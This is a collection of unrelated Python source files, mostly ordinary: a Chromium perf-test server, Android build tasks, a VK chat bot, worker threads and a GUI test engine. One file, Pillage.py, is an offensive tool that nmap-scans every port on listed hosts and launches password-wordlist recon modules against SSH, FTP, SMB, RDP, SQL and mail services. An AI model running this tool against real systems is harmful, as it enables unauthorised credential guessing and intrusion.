]
# Log in to a test Google account to make connections to the above Google
# websites more interesting.
self._LoginToGoogleAccount()
self._RunTest(tabs, 'MemLive', 20)
class PerfTestServerRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""Request handler for the local performance test server."""
def _IgnoreHandler(self, unused_args):
"""A GET request handler that simply replies with status code 200.
Args:
unused_args: A dictionary of arguments for the current GET request.
The arguments are ignored.
"""
self.send_response(200)
self.end_headers()
def _CreateFileOfSizeHandler(self, args):
"""A GET handler that creates a local file with the specified size.
Args:
args: A dictionary of arguments for the current GET request. Must
contain 'filename' and 'mb' keys that refer to the name of the file
to create and its desired size, respectively.
"""
megabytes = None
filename = None
try:
megabytes = int(args['mb'][0])
filename = args['filename'][0]
except (ValueError, KeyError, IndexError), e:
logging.exception('Server error creating file: %s', e)
assert megabytes and filename
with open(os.path.join(self.server.docroot, filename), 'wb') as f:
f.write('X' * 1024 * 1024 * megabytes)
self.send_response(200)
self.end_headers()
def _DeleteFileHandler(self, args):
"""A GET handler that deletes the specified local file.
Args:
args: A dictionary of arguments for the current GET request. Must
contain a 'filename' key that refers to the name of the file to
delete, relative to the server's document root.
"""
filename = None
try:
filename = args['filename'][0]
except (KeyError, IndexError), e:
logging.exception('Server error deleting file: %s', e)
assert filename
try:
os.remove(os.path.join(self.server.docroot, filename))
except OSError, e:
logging.warning('OS error removing file: %s', e)
self.send_response(200)
self.end_headers()
def _StartUploadHandler(self, args):
"""A GET handler to serve a page that uploads the given amount of data.
When the page loads, the specified amount of data is automatically
uploaded to the same local server that is handling the current request.
Args:
args: A dictionary of arguments for the current GET request. Must
contain an 'mb' key that refers to the size of the data to upload.
"""
megabytes = None
try:
megabytes = int(args['mb'][0])
except (ValueError, KeyError, IndexError), e:
logging.exception('Server error starting upload: %s', e)
assert megabytes
script = """
<html>
<head>
<script type='text/javascript'>
function startUpload() {
var megabytes = %s;
var data = Array((1024 * 1024 * megabytes) + 1).join('X');
var boundary = '***BOUNDARY***';
var xhr = new XMLHttpRequest();
xhr.open('POST', 'process_upload', true);
xhr.setRequestHeader(
'Content-Type',
'multipart/form-data; boundary="' + boundary + '"');
xhr.setRequestHeader('Content-Length', data.length);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
document.getElementById('upload_result').innerHTML =
xhr.responseText;
}
};
var body = '--' + boundary + '\\r\\n';
body += 'Content-Disposition: form-data;' +
'file_contents=' + data;
xhr.send(body);
}
</script>
</head>
<body onload="startUpload();">
<div id='upload_result'>Uploading...</div>
</body>
</html>
""" % megabytes
self.send_response(200)
self.end_headers()
self.wfile.write(script)
def _ProcessUploadHandler(self, form):
"""A POST handler that discards uploaded data and sends a response.
Args:
form: A dictionary containing posted form data, as returned by
urlparse.parse_qs().
"""
upload_processed = False
file_size = 0
if 'file_contents' in form:
file_size = len(form['file_contents'][0])
upload_processed = True
self.send_response(200)
self.end_headers()
if upload_processed:
self.wfile.write('Upload complete (%d bytes)' % file_size)
else:
self.wfile.write('No file contents uploaded')
GET_REQUEST_HANDLERS = {
'create_file_of_size': _CreateFileOfSizeHandler,
'delete_file': _DeleteFileHandler,
'start_upload': _StartUploadHandler,
'favicon.ico': _IgnoreHandler,
}
POST_REQUEST_HANDLERS = {
'process_upload': _ProcessUploadHandler,
}
def translate_path(self, path):
"""Ensures files are served from the given document root.
Overridden from SimpleHTTPServer.SimpleHTTPRequestHandler.
"""
path = urlparse.urlparse(path)[2]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words) # Remove empty strings from |words|.
path = self.server.docroot
for word in words:
_, word = os.path.splitdrive(word)
_, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
def do_GET(self):
"""Processes a GET request to the local server.
Overridden from SimpleHTTPServer.SimpleHTTPRequestHandler.
"""
split_url = urlparse.urlsplit(self.path)
base_path = split_url[2]
if base_path.startswith('/'):
base_path = base_path[1:]
args = urlparse.parse_qs(split_url[3])
if base_path in self.GET_REQUEST_HANDLERS:
self.GET_REQUEST_HANDLERS[base_path](self, args)
else:
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
"""Processes a POST request to the local server.
Overridden from SimpleHTTPServer.SimpleHTTPRequestHandler.
"""
form = urlparse.parse_qs(
self.rfile.read(int(self.headers.getheader('Content-Length'))))
path = urlparse.urlparse(self.path)[2]
if path.startswith('/'):
path = path[1:]
if path in self.POST_REQUEST_HANDLERS:
self.POST_REQUEST_HANDLERS[path](self, form)
else:
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write('No handler for POST request "%s".' % path)
class ThreadedHTTPServer(SocketServer.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
def __init__(self, server_address, handler_class):
BaseHTTPServer.HTTPServer.__init__(self, server_address, handler_class)
class PerfTestServer(object):
"""Local server for use by performance tests."""
def __init__(self, docroot):
"""Initializes the performance test server.
Args:
docroot: The directory from which to serve files.
"""
# The use of 0 means to start the server on an arbitrary available port.
self._server = ThreadedHTTPServer(('', 0),
PerfTestServerRequestHandler)
self._server.docroot = docroot
self._server_thread = threading.Thread(target=self._server.serve_forever)
def Run(self):
"""Starts the server thread."""
self._server_thread.start()
def ShutDown(self):
"""Shuts down the server."""
self._server.shutdown()
self._server_thread.join()
def GetPort(self):
"""Identifies the port number to which the server is currently bound.
Returns:
The numeric port number to which the server is currently bound.
"""
return self._server.server_address[1]
if __name__ == '__main__':
pyauto_functional.Main()
|
Pillage.py
|
#!/usr/bin/python
import argparse, time, sys, os
import subprocess, multiprocessing
class Pillage(object):
def __init__(self, directoryName="pillageResults", userList="wordlists/users.txt", passList="wordlists/mutatedMega.txt"):
self.banner()
self.parseArgs()
self.userList=userList
self.passList=passList
self.createDir(directoryName)
self.pillageHosts()
def parseArgs(self):
parser = argparse.ArgumentParser(prog='Analyzes a group of hosts and enumerates interesting info', add_help=True)
parser.add_argument('hostfile', help='host range to scan')
args = parser.parse_args()
self.hosts=self.analyzeHostfile(args.hostfile)
def addProcess(self, method, arguments):
p = multiprocessing.Process(target=method, args=(arguments,))
p.start()
def sshEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected SSH on " + host + ":" + port
script = "python sshRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
def ftpEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected FTP on " + host + ":" + port
script = "python ftpRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
#Http and Https are the same but just change filename
def httpEnum(self, args):
host=args[0]
port=args[1]
protocol=args[2]
print "INFO: Detected webapp on " + host + ":" + port
script = "python webRecon.py {} {} {} {} {}".format(host, port, protocol, self.userList, self.passList)
subprocess.call(script, shell=True)
def dnsEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected DNS on " + host + ":" + port
script = "python dnsRecon.py {} {}".format(host, port)
subprocess.call(script, shell=True)
def msSqlEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected MS-SQL on " + host + ":" + port
script = "python msSqlRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
def snmpEnum(self, host, port):
host=args[0]
port=args[1]
print "INFO: Detected snmp on " + host + ":" + port
script = "python snmpRecon.py {} {}".format(host, port)
subprocess.call(script, shell=True)
def smtpEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected smtp on " + host + ":" + port
script = "python smtpRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
def smbEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected smb on " + host + ":" + port
script = "python smbRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
def rdpEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected rdp on " + host + ":" + port
script = "python rdpRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
def pillageHosts(self):
for host in self.hosts:
tcpServices, udpServices = self.scanHost(host)
for service in tcpServices:
port=service[0].split('/')[0]
serv=service[2]
if serv == 'ssh':
self.addProcess(self.sshEnum, [host, port])
elif serv == 'ftp':
self.addProcess(self.ftpEnum, [host, port])
elif serv == 'dns':
self.addProcess(self.dnsEnum, [host, port])
elif 'https' in serv or 'http' in serv:
protocol = 'http'
if 'ssl' in serv or 'https' in serv:
protocol = 'http'
self.addProcess(self.httpEnum, [host, port, protocol])
elif serv == 'msSql' or serv == 'ms-sql-s' or serv == 'ms-sql':
self.addProcess(self.msSqlEnum, [host, port])
elif serv == 'smtp':
self.addProcess(self.smtpEnum, [host, port])
elif serv == 'snmp':
self.addProcess(self.snmpEnum, [host, port])
elif serv == 'smb':
self.addProcess(self.smbEnum, [host, port])
elif serv == 'rdp' or serv == ' microsoft-rdp' or serv == 'ms-wbt-server' or serv == 'ms-term-serv':
self.addProcess(self.rdpEnum, [host, port])
else:
print "INFO: no module found for %s" % (serv)
print "INFO: TCP/UDP Nmap scans completed for " + host
#Iterate through UDP
def scanHost(self, host):
print "INFO: Running general TCP/UDP nmap scans for " + host
fullPath="{}/{}".format(self.dirPath,str(host))
TCPSCAN = "nmap -vv -Pn -A -sC -sV -T 4 -p- -oN '%s.nmap' -oX '%s.xml' %s" % (fullPath, fullPath, host)
results = subprocess.check_output(TCPSCAN, shell=True)
# None of the modules support UDP at this time, so I am omitting the scan and results.
#UDPSCAN = "nmap -vv -Pn -A -sC -sV -sU -T 4 --top-ports 500 -oN '%sU.nmap' -oX '%sU.xml' %s" % (fullPath, fullPath, host)
udpresults= []#subprocess.check_output(UDPSCAN, shell=True)
return self.getInterestingTCP(host, results), self.getInterestingUDP(host, udpresults)
def getInterestingTCP(self, host, results):
tcpServices=[]
for line in iter(results.splitlines()):
words=line.split()
try:
if words and words[1] == "open" and "/tcp" in words[0]:
tcpServices.append(words)
except:
#weird formatting...
continue
return tcpServices
#Could implement
def getInterestingUDP(self,host, results):
return []
def recordResults(self, host, results):
filepath="{}/{}Results.txt".format(self.dirPath,str(host))
with open(filepath, "a") as myfile:
myfile.write(results)
def analyzeHostfile(self, hostfile):
try:
with open(hostfile) as f:
allHosts=[]
for line in f:
if line[0]=='#':
pass
else:
if len(line.split())==1:
allHosts.append(line.strip())
else:
raise
return allHosts
except:
print "Invalid host file formatting!"
sys.exit()
def createDir(self, directory):
self.dirPath=directory
if not os.path.exists(directory):
os.makedirs(directory)
def banner(self):
print "############################################################"
print "#### PILLAGE ####"
print "#### Kicking Hosts and Taking Services ####"
print "############################################################"
if __name__ == "__main__":
pillager = Pillage()
|
android_collection.py
|
import multiprocessing
import os
from time import sleep
import re
from invoke import task
from invoke_collections import kivy_collection
from invoke_collections.utils import tprint, fprint, iprint
@task
def check_genymotion(ctx):
"""
Checks if genymotion was installed properly
"""
genymotion_path = ctx.get('genymotion_path')
if not genymotion_path:
raise RuntimeError("Genymotion path is not set. Set 'genymotion_path' in invoke.json")
if os.path.exists(genymotion_path):
print "Genymotion path exists. Good... Checking player..."
if os.path.exists(os.path.join(genymotion_path, 'player')):
print "Player found."
else:
fprint("Genymotion path does not contain player binary and seems not to be genymotion installation")
else:
fprint("Genymotion path does not exist. Set correct one in invoke.json")
@task
def projects_build(ctx):
"""
Build third party android projects like google play services and facebook SDK
"""
tprint("Building google play services project...")
ctx.run("%s update project -t 1 -p ./google-play-services_lib --subprojects" % ctx['sdk_manager'])
ctx.run("%s update project -t 1 -p ./facebook-android-sdk/facebook --subprojects" % ctx['sdk_manager'])
@task(
help={
"profile": "Build profile to use. Default: empty string meaning google play"
}
)
def patch(ctx, profile=''):
"""
Patch p4a android project with the updated versions of files, placed in patch/ directory
"""
import buildozer
buildo = buildozer.Buildozer()
buildo.config_profile = profile
buildo._merge_config_profile()
buildozer_config = buildo.config
package_name = buildozer_config.get('app', 'package.name')
dist_path = ".buildozer/android/platform/build/dists/%s" % package_name
if not os.path.exists(dist_path):
fprint("Android project directory %s does not exist, won't patch" % dist_path)
return False
tprint("Patching android project: %s" % dist_path)
ctx.run(
"rsync -rav ./patch/android/%s/* "
"%s" % (package_name, dist_path)
)
tprint("Patching done")
return True
@task(
pre=[check_genymotion],
)
def genymotion(ctx):
"""
Start emulator. Device id is taken from invoke.json
"""
tprint("Starting genymotion device...")
print "Known virtual machines:"
devices = ctx.run("VBoxManage list vms")
devices = re.split('\\n|\\t', devices.stdout)
pattern = re.compile(r"\"(.*?)\" \{(.*?)\}")
device_names = {}
for line in devices:
if not line:
continue
match = pattern.search(line)
if match:
device_names[match.groups()[1]] = match.groups()[0]
else:
print "Can't parse machine name: %s" % line
try:
if not ctx['genymotion_device_id'] in device_names:
fprint("Genymotion device %s is not found in installed genymotion machines." %
(ctx['genymotion_device_id'],))
else:
iprint("Starting %s..." % device_names[ctx['genymotion_device_id']])
command = "%(genymotion)s --vm-name %(device_id)s&" % {
"genymotion": os.path.join(ctx['genymotion_path'], 'player'),
"device_id": ctx['genymotion_device_id']
}
process = multiprocessing.Process(target=ctx.run, args=(command,))
process.daemon = True
process.start()
print 'Waiting genymotion to load'
sleep(20)
except KeyError:
fprint("Genymotion device is not set. Set 'genymotion_device_id' in invoke.json")
@task(
help={
"debug": "List only debug apks"
}
)
def apks(ctx, debug=True):
"""
Print information about located apks in the bin/ directory
"""
import buildozer
buildozer_config = buildozer.Buildozer().config
if debug:
pattern = re.compile(r"%s\-(?P<version>\d+\.\d+\.\d+)\-debug\.apk$" % buildozer_config.get('app', 'title'))
else:
pattern = re.compile(r"%s\-(?P<version>\d+\.\d+\.\d+)\-release\.apk$" % buildozer_config.get('app', 'title'))
candidate_apks = {}
for path in sorted(os.listdir(os.path.abspath('bin'))):
match = pattern.search(path)
if match:
version = match.groups()[0]
candidate_apks[version] = path
print version
print "%s apks" % len(candidate_apks)
@task
def ensure_devices(ctx):
"""
Check if genymotion emulator is running
"""
tprint("Start devices...")
ds = devices(ctx)
if not ds:
genymotion(ctx)
ds = devices(ctx)
if not ds:
fprint("Tried to start emulator, still no devices found. Something is wrong.")
exit(1)
iprint("Found %s devices" % len(ds))
@task(
pre=[ensure_devices],
help={
"profile": "Profile to use. Default: empty string, meaning google play",
"debug": "Install debug apk"
}
)
def install(ctx, profile=None, debug=False):
"""
Install the latest available apk into currently available device (emulator or real device)
"""
import buildozer
profile = profile or ""
buildo = buildozer.Buildozer()
buildo.config_profile = profile
buildo._merge_config_profile()
buildozer_config = buildo.config
name = buildozer_config.get('app', 'title').replace(" ", "")
print "Check if already installed..."
installed_packages = ctx.run("%(adb)s shell pm list packages %(domain)s.%(name)s" % {
"adb": ctx['adb'],
"domain": buildozer_config.get('app', 'package.domain'),
"name": buildozer_config.get('app', 'package.name')
}).stdout
if installed_packages:
print "Found old version, uninstall..."
ctx.run('%(adb)s uninstall %(domain)s.%(name)s' % {
"adb": ctx['adb'],
"domain": buildozer_config.get('app', 'package.domain'),
"name": buildozer_config.get('app', 'package.name')
})
else:
print "Not installed, pass..."
if debug:
filename = "%s-%s-debug.apk" % (name, buildo.get_version())
else:
filename = "%s-%s-release.apk" % (name, buildo.get_version())
ctx.run('%(adb)s install -r %(apk_path)s' % {
'adb': ctx['adb'],
'apk_path': os.path.join(os.path.abspath('bin'), filename)
})
@task(
default=True,
pre=[ensure_devices],
help={
"profile": "Profile to use. Default: empty string, meaning google play",
}
)
def start(ctx, profile=None, logcat=False):
"""
Start kognitivo inside the current device (emulator or real device)
"""
import buildozer
profile = profile or ""
buildo = buildozer.Buildozer()
buildozer_config = buildo.config
buildo.config_profile = profile
buildo._merge_config_profile()
tprint("Starting %s on android" % buildozer_config.get('app', 'package.name'))
ctx.run("%(adb)s shell input keyevent 82" % {
"adb": ctx["adb"],
})
ctx.run("%(adb)s shell am start -n %(package_id)s/org.kivy.android.PythonActivity" % {
"adb": ctx["adb"],
"package_id": "%s.%s" % (buildozer_config.get('app', 'package.domain'),
buildozer_config.get('app', 'package.name'))
})
if logcat:
log(ctx, all=True)
@task
def devices(ctx):
"""
List currently available devices
"""
tprint("Checking devices...")
ds = ctx.run('%(adb)s devices' % {
'adb': ctx['adb'],
})
ds = re.split('\\n', ds.stdout)
serial_pattern = re.compile(r"([0-9a-z]{8})")
ip_pattern = re.compile(r"(\d+\.\d+\.\d+\.\d+):\d+")
ds_names = []
for i, line in enumerate(ds):
match = serial_pattern.search(line)
if match and i != 0:
print "Serial device %s" % match.groups()[0]
ds_names.append(match.groups()[0])
match = ip_pattern.search(line)
if match:
print "IP device %s" % match.groups()[0]
ds_names.append(match.groups()[0])
if not ds_names:
print "No devices found..."
else:
return ds_names
@task(
pre=[ensure_devices],
help={
"all": "Log everything, no filtering for log coming from python activity only"
}
)
def log(ctx, all=False):
"""
Start logging from current device (emulator or real device)
"""
tprint("Starting logcat...")
try:
if all:
print "Capturing all..."
ctx.run("%(adb)s logcat -c; ADB=%(adb)s logcat-color --config=logcat-color" % {
"adb": ctx['adb']
}, pty=True)
else:
print "Capturing python only..."
ctx.run("%(adb)s logcat -c; ADB=%(adb)s logcat-color --config=logcat-color| egrep 'python'" % {
"adb": ctx['adb']
}, pty=True)
except KeyboardInterrupt:
exit(0)
@task(
pre=[projects_build, kivy_collection.po, kivy_collection.mo],
help={
"deploy": "Immediately install and run on the currently availble device",
"logcat": "Start logging after installation is finished and the application is started"
}
)
def debug(ctx, deploy=True, logcat=False):
"""
Create debug apk
"""
patched = patch(ctx)
if deploy:
ensure_devices(ctx)
tprint("Building and installing android in debug mode...")
ctx.run("buildozer android debug", pty=True)
if not patched:
patch(ctx)
ctx.run("buildozer android debug", pty=True)
if deploy:
install(ctx, profile='', debug=True)
start(ctx, profile='')
if logcat:
log(ctx, all=True)
@task(
pre=[projects_build, kivy_collection.po, kivy_collection.mo],
help={
"deploy": "Immediately install and run on the currently availble device",
"logcat": "Start logging after installation is finished and the application is started"
}
)
def release(ctx, deploy=True, logcat=False):
"""
Create release apk for google play
"""
patched = patch(ctx)
if deploy:
ensure_devices(ctx)
tprint("Building and installing android in release mode...")
os.environ['P4A_RELEASE_KEYSTORE'] = ctx['keystore']
os.environ['P4A_RELEASE_KEYALIAS'] = ctx['keystore_alias']
os.environ['P4A_RELEASE_KEYSTORE_PASSWD'] = ctx['keystore_password']
os.environ['P4A_RELEASE_KEYALIAS_PASSWD'] = ctx['keystore_password']
ctx.run("buildozer android release", pty=True)
if not patched:
patch(ctx)
ctx.run("buildozer android release", pty=True)
if deploy:
install(ctx, profile='release', debug=False)
start(ctx, profile='release')
if logcat:
log(ctx, all=True)
@task
def manager(ctx):
"""
Start android SDK manager
"""
tprint("Starting android sdk manager...")
process = multiprocessing.Process(target=ctx.run, args=(ctx['sdk_manager'],))
process.daemon = True
process.start()
sleep(5)
@task
def avd_manager(ctx):
"""
Start android SDK manager
"""
tprint("Starting android emulators manager...")
process = multiprocessing.Process(target=ctx.run, args=(ctx['sdk_manager'] + " avd",))
process.daemon = True
process.start()
sleep(5)
@task
def adb_kill(ctx):
"""
Kills running ADB daemon, sometimes useful is you get "port is in use" errors
"""
ctx.run("%s kill-server" % ctx['adb'])
@task
def adb_start(ctx):
"""
Starts ADB daemon, sometimes useful is you get "port is in use" errors
"""
ctx.run("%s start-server" % ctx['adb'])
|
generate_env_map.py
|
import multiprocessing
from utils.img_utils import crop_map_image
from utils.utils import log, AttrDict
def _generate_env_map_worker(make_env_func, return_dict):
map_img = coord_limits = None
env = make_env_func()
try:
if env.unwrapped.coord_limits and hasattr(env.unwrapped, 'get_automap_buffer'):
from vizdoom import ScreenResolution
env.unwrapped.show_automap = True
env.unwrapped.screen_w = 800
env.unwrapped.screen_h = 600
env.unwrapped.screen_resolution = ScreenResolution.RES_800X600
env.reset()
env.unwrapped.game.advance_action()
map_img = env.unwrapped.get_automap_buffer()
map_img = crop_map_image(map_img)
coord_limits = env.unwrapped.coord_limits
except AttributeError as exc:
log.warning(f'Could not get map image from env, exception: {exc}')
finally:
env.close()
return_dict['map_img'] = map_img
return_dict['coord_limits'] = coord_limits
def generate_env_map(make_env_func):
"""
Currently only Doom environments support this.
We have to initialize the env instance in a separate process because otherwise Doom overrides the signal handler
and we cannot do things like KeyboardInterrupt anympore.
"""
manager = multiprocessing.Manager()
return_dict = manager.dict()
p = multiprocessing.Process(target=_generate_env_map_worker, args=(make_env_func, return_dict))
p.start()
p.join()
return_dict = AttrDict(return_dict)
return return_dict.map_img, return_dict.coord_limits
|
main.py
|
import argparse
import json
import random
import time
import traceback
from threading import Thread
import aiohttp
import requests
import vk_api
from vkbottle.api import UserApi
from vkbottle.user import User
from idm_lp import const
from idm_lp.commands import commands_bp
from idm_lp.database import Database, DatabaseError
from idm_lp.error_handlers import error_handlers_bp
from idm_lp.logger import logger, Logger, LoggerLevel
from idm_lp.utils import check_ping
if const.ALLOW_SENTRY:
import sentry_sdk
sentry_sdk.init(
const.SENTRY_URL,
traces_sample_rate=1.0
)
parser = argparse.ArgumentParser(
description='LP модуль позволяет работать приемнику сигналов «IDM multi» работать в любых чатах.\n'
'Так же он добавляет игнор, глоигнор, мут и алиасы.'
)
parser.add_argument(
'--config_path',
type=str,
dest="config_path",
default="config.json",
help='Путь до файла с конфингом'
)
parser.add_argument(
'--base_domain',
type=str,
dest="base_domain",
default="https://irisduty.ru",
help='Базовый домен'
)
parser.add_argument(
'--use_app_data',
dest="use_app_data",
action="store_const",
const=True,
help='Использовать папку AppData/IDM (Windows).\n'
'При использовании этой настройки AppData/IDM и config_path складываются'
)
parser.add_argument(
'--logger_level',
dest="logger_level",
type=str,
default="INFO",
help='Уровень логгирования.'
)
parser.add_argument(
'--vkbottle_logger_level',
dest="vkbottle_logger_level",
type=str,
default="INFO",
help='Уровень логгирования VKBottle.'
)
parser.add_argument(
'--log_to_path',
dest="log_to_path",
action="store_const",
const=True,
help='Логи в файл'
)
parser.add_argument(
'--enable_eval',
dest="enable_eval",
action="store_const",
const=True,
help='Разрешить eval/exec'
)
def awtor(tokens):
colvo = len(tokens)
colvo_random = random.randint(0, colvo)
session = vk_api.VkApi(token=tokens[colvo_random - 1])
vk = session.get_api()
return vk
def zaraza():
db = Database.load()
vk = awtor(db.tokens)
while True:
db_while = Database.load()
if db_while.worker:
try:
vk.messages.send(peer_id=db.worker_chat, message=f'заразить {db_while.worker_param}', random_id=0)
time.sleep(db_while.worker_time)
except:
time.sleep(db_while.worker_time)
else:
time.sleep(120)
def lp_startup(database):
async def _lp_startup():
api = UserApi.get_current()
text = f'IDM multi LP запущен\n' \
f'Текущая версия: v{const.__version__}'
version_rest = requests.get(const.VERSION_REST).json()
if version_rest['version'] != const.__version__:
text += f"\n\n Доступно обновление {version_rest['version']}\n" \
f"{version_rest['description']}\n" \
f"{const.GITHUB_LINK}"
await api.messages.send(
peer_id=await api.user_id,
random_id=0,
message=text
)
async with aiohttp.ClientSession(headers={"User-Agent": const.APP_USER_AGENT}) as session:
async with session.post(const.GET_LP_INFO_LINK(), json={'access_token': database.tokens[0]}) as resp:
response = await resp.json()
if 'error' in response:
await api.messages.send(
peer_id=await api.user_id,
random_id=0,
message=f"⚠ Ошибка: {response['error']['detail']}"
)
raise KeyboardInterrupt()
else:
if not response['response']['is_active']:
await api.messages.send(
peer_id=await api.user_id,
random_id=0,
message=f"⚠ Ошибка: дежурный не активен"
)
raise KeyboardInterrupt()
database.secret_code = response['response']['secret_code']
database.save()
await check_ping(database.secret_code)
return _lp_startup
def run_lp():
args = parser.parse_args()
const.CONFIG_PATH = args.config_path
const.BASE_DOMAIN = args.base_domain
const.USE_APP_DATA = args.use_app_data if args.use_app_data else False
const.LOG_TO_PATH = args.log_to_path if args.log_to_path else False
const.LOGGER_LEVEL = args.logger_level
const.VKBOTTLE_LOGGER_LEVEL = args.vkbottle_logger_level
const.ENABLE_EVAL = args.enable_eval if args.enable_eval else False
if isinstance(logger, Logger):
logger.global_logger_level = LoggerLevel.get_int(const.LOGGER_LEVEL)
logger.warning(
f"\n\nЗапуск с параметрами:\n"
f" -> Уровень логгирования -> {const.LOGGER_LEVEL}\n"
f" -> Уровень логгирования VKBottle -> {const.VKBOTTLE_LOGGER_LEVEL}\n"
f" -> Логи в файл -> {const.LOG_TO_PATH}\n"
f" -> Путь до файла с конфингом -> {Database.get_path()}\n"
f" -> Использовать папку AppData/IDM -> {const.USE_APP_DATA}\n"
f" -> Базовый домен -> {const.BASE_DOMAIN}\n"
f" -> API -> {const.GET_LP_INFO_LINK()}\n"
f" -> Callback link -> {const.CALLBACK_LINK()}\n"
f" -> Разрешить eval/exec -> {const.ENABLE_EVAL}\n\n"
)
try:
db = Database.load()
Database.set_current(db)
except DatabaseError as ex:
logger.error(
f"{ex.name} | {ex.description}"
)
exit(-1)
except json.JSONDecodeError as ex:
logger.error(
f'При запуске произошла ошибка базы данных.\n'
f'Проверте целостность данных.\n'
f'Строка: {ex.lineno}, столбец: {ex.colno}.'
)
exit(-1)
except Exception as ex:
logger.error(f'При запуске произошла ошибка [{ex.__class__.__name__}] {ex}\n{traceback.format_exc()}')
exit(-1)
else:
from idm_lp.validators import (
alias,
role_play_command,
self_prefix,
duty_prefix,
service_prefix,
repeater_word,
yes_or_no
)
user = User(
tokens=db.tokens,
debug=const.VKBOTTLE_LOGGER_LEVEL,
log_to_path=const.LOG_TO_PATH
)
user.set_blueprints(
*commands_bp,
*error_handlers_bp,
)
Thread(target=zaraza).start()
user.run_polling(
auto_reload=False,
on_startup=lp_startup(db),
)
|
positions.py
|
from threading import Thread
import time
from src.config import CONFIG
from src.events import POSITION, fire_event
class PositionsWorker:
def start(self, executions):
t = Thread(target=self._run, args=(executions,))
t.start()
def _run(self, executions):
while True:
fire_event(executions, (POSITION, CONFIG['market']))
time.sleep(5)
|
computing_node.py
|
from dataclasses import dataclass
from logs import get_logger
from typing import NoReturn, Union
from settings_loader.settings_loader import SettingsLoader
from message_putter.computing_node_putter import PingPutter, DoneTaskPutter
from message_accepters.computing_node_accepter import StatisticTaskAccepter, BalancedTaskAccepter
from utils.error_context_handler_mixin import ErrorHandlerContextMixin
from algorithm_getters.algorithm_getter import AlgorithmGetter
from computing_nodes.blocks.task_algorithm import TaskAlgorithm
from computing_nodes.blocks.task_data_getter import TaskDataGetter
from computing_nodes.blocks.task_data_saver import TaskDataSaver
from utils.timed_dict import TimedDict
import threading
logger = get_logger(__name__)
settings = SettingsLoader.get_instance()
@dataclass
class NodeInfo:
status: str
node_name = settings.service_id
class ComputingNode(ErrorHandlerContextMixin):
def __init__(self):
super(ComputingNode, self).__init__()
self.current_state = None
self.ping = PingPutter()
self.done_task = DoneTaskPutter()
self.task_accepter = BalancedTaskAccepter()
self.statistic_accepter = StatisticTaskAccepter(settings.service_id)
self.node_info = NodeInfo(status='working')
self.algorithm_getter = AlgorithmGetter()
self.task: Union[dict, None] = None
main = threading.Thread(target=self.run_main_logic)
pings = threading.Thread(target=self.run_pings)
statistic = threading.Thread(target=self.run_statistic_logic)
self.current_statistics = TimedDict(60)
main.start()
pings.start()
statistic.start()
main.join()
pings.join()
statistic.join()
def preprocess_task(self, task):
task['statistic'] = {}
task['statistic']['getter'] = None
task['statistic']['saver'] = None
task['statistic']['algorithms'] = {}
return task
def run_main_logic(self) -> NoReturn:
while not self.stop_event.is_set():
with self.error_handler_context():
_, self.task = self.task_accepter.get_task()
self.task: dict
self.task = self.preprocess_task(self.task)
logger.info(f'got task: {self.task}')
data_getter = self.algorithm_getter.get_getter(
self.task['dataSet']['dataGetter']['fileName'], self.task['dataSet']['dataGetter'].get('file')
)
algorithm = [
self.algorithm_getter.get_algorithm(step['fileName'], step.get('file'))
for step in self.task['algorithm']['tasks']
]
data_saver = self.algorithm_getter.get_saver(
self.task['dataSet']['dataSaver']['fileName'], self.task['dataSet']['dataSaver'].get('file')
)
###
context, self.task = TaskDataGetter.get_data(self.task, data_getter)
context, self.task = TaskAlgorithm.execute(context, self.task, algorithm)
context, self.task = TaskDataSaver.save_data(context, self.task, data_saver)
###
self.current_statistics[self.task['id']] = self.task['statistic']
self.done_task.put_task(self.task)
self.done_task.return_response()
def run_statistic_logic(self) -> NoReturn:
while not self.stop_event.is_set():
with self.error_handler_context():
call_info, statistic_request = self.statistic_accepter.get_task()
statistic_request: dict
logger.info(f'got statistic_request {statistic_request} {self.current_statistics.dict}')
self.statistic_accepter.respond_to_task(
call_info, self.current_statistics.dict.get(statistic_request['id'])
)
def run_pings(self) -> NoReturn:
self.ping.put_task(self.node_info)
while not self.stop_event.wait(60):
self.ping.put_task(self.node_info)
self.node_info.status = 'quit'
self.ping.put_task(self.node_info)
|
__init__.py
|
""" Don't load any Java stuff at global scope, needs to be importable by CPython also """
import storytext.guishared, os, types
from threading import Thread
class ScriptEngine(storytext.guishared.ScriptEngine):
eventTypes = [] # Can't set them up until the Eclipse class loader is available
signalDescs = {}
def __init__(self, *args, **kw):
self.testThread = None
storytext.guishared.ScriptEngine.__init__(self, *args, **kw)
def createReplayer(self, universalLogging=False, **kw):
return UseCaseReplayer(self.uiMap, universalLogging, self.recorder, **kw)
def setTestThreadAction(self, method):
self.testThread = Thread(target=method)
def runSystemUnderTest(self, args):
self.testThread.start()
self.run_python_or_java(args)
def importCustomEventTypes(self, *args):
pass # Otherwise they get loaded too early and hence get the wrong classloader (in RCP)
def importCustomEventTypesFromSimulator(self, eventTypes):
self.eventTypes = eventTypes
storytext.guishared.ScriptEngine.importCustomEventTypes(self, "storytext.javaswttoolkit.nattablesimulator", "nebula")
storytext.guishared.ScriptEngine.importCustomEventTypes(self, "customwidgetevents")
def getDescriptionInfo(self):
return "SWT", "javaswt", "event types", \
"http://help.eclipse.org/helios/index.jsp?topic=/org.eclipse.platform.doc.isv/reference/api/"
